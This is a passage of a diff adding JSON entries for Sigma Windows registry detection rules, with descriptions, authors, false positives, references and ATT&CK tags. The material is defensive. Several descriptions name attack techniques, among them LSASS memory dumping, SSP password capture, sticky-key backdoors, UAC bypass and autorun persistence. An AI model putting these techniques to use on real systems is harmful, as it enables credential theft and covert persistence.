For command execution see rule win_netsh_port_fwd.yml.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/06/22", + "falsepositive": [ + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", + "Synergy Software KVM (https://symless.com/synergy)" + ], + "filename": "registry_event_portproxy_registry_key.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.dfirnotes.net/portproxy_detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "value": "PortProxy Registry Key" + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "meta": { + "author": "Alexander Rausch", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_redmimicry_winnti_reg.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "value": "RedMimicry Winnti Playbook Registry Manipulation" + }, + { + "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", + "meta": { + "author": "omkar72", + "creation_date": "2020/10/30", + 
"falsepositive": [ + "Unknown" + ], + "filename": "registry_event_runkey_winekey.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "value": "WINEKEY Registry Modification" + }, + { + "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", + "meta": { + "author": "Avneet Singh @v3t0_, oscd.community", + "creation_date": "2020/11/15", + "falsepositive": [ + "Legitimate modification of the registry key by legitimate program" + ], + "filename": "registry_event_runonce_persistence.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/990717080805789697", + "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", + "value": "Run Once Task Configuration in Registry" + }, + { + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. 
UACMe 33 or 62)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_shell_open_keys_manipulation.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", + "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", + "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1546.001" + ] + }, + "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "value": "Shell Open Registry Keys Manipulation" + }, + { + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/26", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_event_silentprocessexit_lsass.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.007" + ] + }, + "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", + "value": "SilentProcessExit Monitor Registration for LSASS" + }, + { + "description": "Detects the addition of a SSP to the 
registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", + "meta": { + "author": "iwillkeepwatch", + "creation_date": "2019/01/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_event_ssp_added_lsa_config.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.005" + ] + }, + "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "value": "Security Support Provider (SSP) Added to LSA Configuration" + }, + { + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "meta": { + "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/03/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_event_stickykey_like_backdoor.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" + ] + }, + "uuid": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "value": "Sticky Key Like Backdoor Usage - Registry" + }, + { + "description": "Detects creation/modification of Assistive Technology applications and 
persistence with usage of 'at'", + "meta": { + "author": "Mateusz Wydra, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Creation of non-default, legitimate at usage" + ], + "filename": "registry_event_susp_atbroker_change.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.persistence", + "attack.t1547" + ] + }, + "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "value": "Atbroker Registry Change" + }, + { + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/01", + "falsepositive": [ + "Software installers downloaded and used by users" + ], + "filename": "registry_event_susp_download_run_key.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "value": "Suspicious Run Key from Download" + }, + { + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/16", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_susp_lsass_dll_load.yml", + "level": "high", + "logsource.category": 
"registry_event", + "logsource.product": "windows", + "refs": [ + "https://blog.xpnsec.com/exploring-mimikatz-part-1/", + "https://twitter.com/SBousseaden/status/1183745981189427200", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1547.008" + ] + }, + "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "value": "DLL Load via LSASS" + }, + { + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "meta": { + "author": "Den Iuzvyk", + "creation_date": "2020/06/07", + "falsepositive": [ + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + ], + "filename": "registry_event_susp_mic_cam_access.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml" + ], + "tags": [ + "attack.collection", + "attack.t1125", + "attack.t1123" + ] + }, + "uuid": "62120148-6b7a-42be-8b91-271c04e281a3", + "value": "Suspicious Camera and Microphone Access" + }, + { + "description": "Alerts on trust record modification within the registry, indicating usage of macros", + "meta": { + "author": "Antonlovesdnb", + "creation_date": "2020/02/19", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "filename": "registry_event_trust_record_modification.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", + 
"http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "value": "Windows Registry Trust Record Modification" + }, + { + "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "meta": { + "author": "Sreeman", + "creation_date": "2020/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_abusing_windows_telemetry_for_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_abusing_windows_telemetry_for_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112", + "attack.t1053" + ] + }, + "uuid": "4e8d5fd3-c959-441f-a941-f73d0cdcdca5", + "value": "Abusing Windows Telemetry For Persistence - Registry" + }, + { + "description": "Detect modification for a specific user to prevent that user from being listed on the logon screen", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_add_hidden_user.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_hidden_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ] + }, + "uuid": "8a58209c-7ae6-4027-afb0-307a78e4589a", + "value": "User Account Hidden By Registry" + }, + { + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_add_load_service_in_safe_mode.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "value": "Registry Persitence via Service in Safe Mode" + }, + { + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_add_port_monitor.yml", + "level": "high", + 
"logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ] + }, + "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", + "value": "Add Port Monitor Persistence in Registry" + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + ], + "filename": "registry_set_aedebug_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/aedebug.html", + "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "092af964-4233-4373-b4ba-d86ea2890288", + "value": "Add Debugger Entry To AeDebug For Persistence" + }, + { + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitmate use of the feature (alerts should be investigated either way)" + ], + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", + "value": "Allow RDP Remote Assistance Feature" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_classes.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "9df5f547-c86a-433e-b533-f2794357e242", + "value": "Classes Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", + "creation_date": "2019/10/25", + "falsepositive": 
[ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_common.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://persistence-info.github.io/Data/userinitmprlogonscript.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "value": "Common Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "value": "CurrentControlSet Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "value": "CurrentVersion Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + 
"Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "value": "CurrentVersion NT Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "value": "Internet Explorer Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_office.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "baecf8fb-edbf-429f-9ade-31fc3f22b970", + "value": "Office Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + 
"Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" + ] + }, + "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "value": "Session Manager Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" + ], + "tags": [ + 
"attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "value": "System Scripts Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_winsock2.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "value": "WinSock2 Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml", + "level": 
"medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "value": "Wow6432Node CurrentVersion Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + 